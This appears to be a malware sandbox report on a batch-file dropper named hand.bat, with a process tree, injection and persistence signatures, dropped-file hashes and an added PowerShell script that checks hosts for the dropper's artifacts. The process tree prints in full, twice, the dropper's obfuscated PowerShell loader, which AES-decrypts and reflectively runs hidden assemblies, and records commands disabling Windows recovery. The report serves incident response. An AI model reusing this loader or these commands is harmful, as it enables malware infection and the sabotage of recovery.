- 1364 dllhost.exe wrote to 612 (5), 680 (7), 976 (12), 476 (13), 764 (14), 716 (15), 632 (16), 1076 (17), 1108 (18), 1116 (19), 1200 (20), 1272 (21), 1356 (23), 1444 (24), 1460 (25), 1480 (26), 1536 (27), 1676 (28), 1688 (29), 1704 (30), 1844 (31), 2000 (32), 2012 (33), 1744 (34), 1064 (35), 1932 (36), 2056 (37), 2144 (38), 2220 (39), 2364 (41), 2524 (42), 2604 (43), 2612 (44), 2764 (45), 2800 (46), 2824 (47), 2860 (48), 2868 (49), 2108 (50), 2136 (51), 3076 (52), 3248 (54), 3280 (55), 3564 (56), 3652 (57), 3768 (58), 780 (60), 4120 (62): one write into essentially every other process on the machine, winlogon.exe, lsass.exe, every svchost.exe, sysmon.exe and Explorer.EXE included
- 2044 powershell.exe wrote to 3208 (92) x2: the cmd.exe that copies hand.bat to $rbx-CO2.bat
- 680 lsass.exe wrote to 2824 sysmon.exe (47) x2: lsass.exe, itself written to by dllhost.exe just before, is then recorded writing into the sysmon.exe process
The write fan-out from 1364 is what distinguishes this run from a plain process-hollowing: after the hand-off from PowerShell, the code in dllhost.exe touches the address space of every listed process, so memory forensics on this host cannot assume that any process image is unmodified.
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times. The corresponding on-disk artifact in this run is the task definition C:\Windows\System32\Tasks\$nya-mQEb5bu8 written by the Schedule service (see "Drops file in System32 directory"); the report does not show the task's action, so the target binary has to be read from the task file or the Task Scheduler itself.
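The host artifacts named in the signatures above (the two $-prefixed directories under C:\Windows, the copied batch file, the dropped oauLVi.exe and the $nya-mQEb5bu8 task) are what a responder sweeps for on other machines. The following is an added example, not part of the report: it checks each path with -LiteralPath (so the '$' in the names is not treated as a wildcard), hashes the files it finds, compares them with hand.bat's SHA256 from the General section (the copy made with "type hand.bat > $rbx-CO2.bat" should hash identically), and reads the scheduled task's action. The function name and the output columns are ours. Run from an elevated prompt; Get-ScheduledTask requires the ScheduledTasks module (Windows 8 / Server 2012 and later).

```powershell
function Find-HandBatArtifacts {
    param([string]$SampleSha256 = '698B1F0A35A76E57ADEF388612B29902F86F56983C772D7C6C17B4483C2BE688')
    # Paths taken from the "Drops file in Windows directory" and
    # "Drops file in System32 directory" signatures of the report.
    $paths = @(
        'C:\Windows\$rbx-onimai2'
        'C:\Windows\$rbx-onimai2\$rbx-CO2.bat'
        'C:\Windows\$nya-onimai2'
        'C:\Windows\$nya-onimai2\oauLVi.exe'
        'C:\Windows\System32\Tasks\$nya-mQEb5bu8'
    )
    foreach ($p in $paths) {
        $present = Test-Path -LiteralPath $p
        $detail = $null
        if ($present -and -not (Get-Item -LiteralPath $p -Force).PSIsContainer) {
            $detail = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash
        }
        [pscustomobject]@{
            Artifact     = $p
            Present      = $present
            Detail       = $detail                      # SHA256 for files, empty for directories
            SameAsSample = ($null -ne $detail -and $detail -eq $SampleSha256)
        }
    }
    # The task itself: the report only shows its definition file being written, so the
    # action (what it launches) is read from the Task Scheduler here.
    $task = Get-ScheduledTask -TaskName '$nya-mQEb5bu8' -ErrorAction SilentlyContinue
    $action = $null
    if ($task) {
        $action = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
    }
    [pscustomobject]@{
        Artifact     = 'scheduled task $nya-mQEb5bu8'
        Present      = [bool]$task
        Detail       = $action
        SameAsSample = $false
    }
}

Find-HandBatArtifacts | Format-Table -AutoSize
```

A hit on any row is a strong indicator because the names are not used by any legitimate Windows component; a hit on $rbx-CO2.bat whose hash differs from hand.bat's indicates a different build of the same dropper rather than a false positive.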
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d5b9cfd4-9e48-4179-a51b-288ac74b712a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1920acd9-7efd-4a75-ba67-774de67381d9}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:976
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:476
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1272 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3280
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1444
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1536
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2136
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2144
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2800
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2860
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2868
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3564
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4420
-
-
C:\Windows\system32\cmd.exe
  cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));  3⤵ PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden  3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\hand.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat  4⤵
- Drops file in Windows directory
PID:3208
-
-
C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "  4⤵ PID:1508
-
C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  5⤵ PID:1252
-
-
C:\Windows\system32\cmd.exe
  cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));  5⤵ PID:1420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden  5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3168 -
C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F  6⤵ PID:2156
-
-
C:\Windows\SYSTEM32\cmd.exe
  "cmd" /K CHCP 437  6⤵ PID:960
-
C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  7⤵ PID:2380
-
-
C:\Windows\system32\chcp.com
  CHCP 437  7⤵ PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell REAgentC.exe /disable  7⤵ PID:652
-
C:\Windows\system32\ReAgentc.exe
  "C:\Windows\system32\ReAgentc.exe" /disable  8⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:380
-
C:\Windows\$nya-onimai2\oauLVi.exe
  "C:\Windows\$nya-onimai2\oauLVi.exe"  2⤵
- Executes dropped EXE
PID:1780 -
C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  3⤵ PID:4572
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc  1⤵ PID:3768
-
C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding  1⤵
- Suspicious use of AdjustPrivilegeToken
PID:780
-
C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding  1⤵ PID:4120
-
C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  1⤵ PID:4356
-
C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding  1⤵ PID:4700
-
C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc  1⤵ PID:4696
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  1⤵
- Modifies data under HKEY_USERS
PID:560
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service  1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1660
-
C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding  1⤵ PID:2848
-
C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager  1⤵ PID:4752
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  1⤵
- Modifies data under HKEY_USERS
PID:5080
-
C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  1⤵ PID:4324
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca  1⤵ PID:4180
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc  1⤵ PID:1512
-
C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding  1⤵ PID:4552
-
C:\Windows\System32\WaaSMedicAgent.exe
  C:\Windows\System32\WaaSMedicAgent.exe 4f8877d37f7047dfe77f21b978646b31 okMwdK+ar0yplkfBH38DEA.0.1.0.0.0  1⤵
- Sets service image path in registry
PID:2288 -
C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  2⤵ PID:2140
-
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv  1⤵ PID:1216
-
C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding  1⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:3812
-
C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe  1⤵ PID:4504
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc  1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding  1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2628
-
C:\Windows\System32\smartscreen.exe
  C:\Windows\System32\smartscreen.exe -Embedding  1⤵ PID:2656
-
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc  1⤵ PID:2160
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize 290B
MD5 bdec669a651b2255e6a3e7a502adf87b
SHA1 69d02d15e91fd182cfa25b8f092bbacaf0aff51b
SHA256 9bfda5443a616dfb72a593bfae4db9ce86dcdd6c2be45312baa703dd3d66f826
SHA512 8621d0255d41267d6d7f2aa5c63fc1cd283f7fb156a6603e32e2052829625b8e6b80b7905e2540551ac6b01e83b1fa37389119048dce9221fa21e561f260581d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9
Filesize 420B
MD5 6906b7f45d3678f75e56272114ec8cb9
SHA1 ef50530280eadd55618f1fd789cca80b1d6c7125
SHA256 c748967763a4192d790f99d1f1c7c6dc2af1d47f8a6f72ced961a25d852b1222
SHA512 6e9bcacc2736e9d4788dbbd7354522a8a0a1e7a0783d8eb279ce7a2abd63d262ffff4e8af4f988ca5fd7f25e317e58c0ca75319a131cdcf304be99841511ce38
-
Filesize 3KB
MD5 01ec6c015ace9f2ac560371d37d38b41
SHA1 a528a34406238a0e71baea5e79bd8fda497cf05e
SHA256 11f26190de4b040b04b6685d2a2db4c7b55c73c5580ac6a01ce1688380e7093d
SHA512 1c387fb4241e009f8423bb69eb03e97c987f80b0ef6ff9b7e32925421fdec4f72eea13eaa925657e139824a02ea45d908c38f01ef94cda7688530eae33895b94
-
Filesize 2KB
MD5 0245ee64bc0ee73ecf5d430fe18905f6
SHA1 5644835df13cd159521b0a0cfd12dbdf5c9732a4
SHA256 06f3ff1e4ef9fcfc2cdc5ffe2357fe5562bbae29bc552b20efbf20bf0a0079f8
SHA512 50760f9334cc06d3792e3c947277d10895c94d3b84f200222d54abc516fda97127a8e35d5266609f6d57af8d765950b31f8438aa21a22144c171d27c5fe9cf29
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 36KB
MD5 b943a57bdf1bbd9c33ab0d33ff885983
SHA1 1cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256 878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512 cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize 7.0MB
MD5 1a013c7ac90b58073895b26cae70def7
SHA1 60c9c3294fc7ac3d336a478274f62f4818498230
SHA256 698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512 c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
-
Filesize 2KB
MD5 4ac1741ceb19f5a983079b2c5f344f5d
SHA1 f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA256 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd
-
Filesize 2KB
MD5 a9124c4c97cba8a07a8204fac1696c8e
SHA1 1f27d80280e03762c7b16781608786f5a98ff434
SHA256 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392